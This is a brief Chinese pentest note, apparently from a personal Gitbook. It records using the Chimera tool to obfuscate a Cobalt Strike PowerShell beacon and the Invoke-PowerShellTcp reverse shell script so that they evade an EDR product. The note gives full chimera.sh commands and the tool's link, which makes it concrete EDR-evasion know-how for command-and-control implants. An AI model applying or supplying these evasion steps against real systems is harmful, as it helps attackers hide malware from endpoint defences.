1.1. 前言

某次项目中,目标的机器上存在某服EDR,为了上线到内网中继的cs,使用cs直接生成的powershell脚本会直接被杀,想着混淆一下ps1脚本来达到目的

1.2. 工具

这里我直接github找了一款混淆工具,能成功绕过EDR,所以记录一下

https://github.com/tokyoneon/chimera

直接使用它的推荐命令可能会报错

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

可以看看其他的说明文档:https://github.com/tokyoneon/Chimera/blob/master/USAGE.md

1.3. 过程

./chimera.sh -f beacon.ps1 -a

image-20220131151639189

Copyright © d4m1ts 2022 all right reserved,powered by Gitbook该文章修订时间: 2022-01-31 15:16:50

results matching ""

    No results matching ""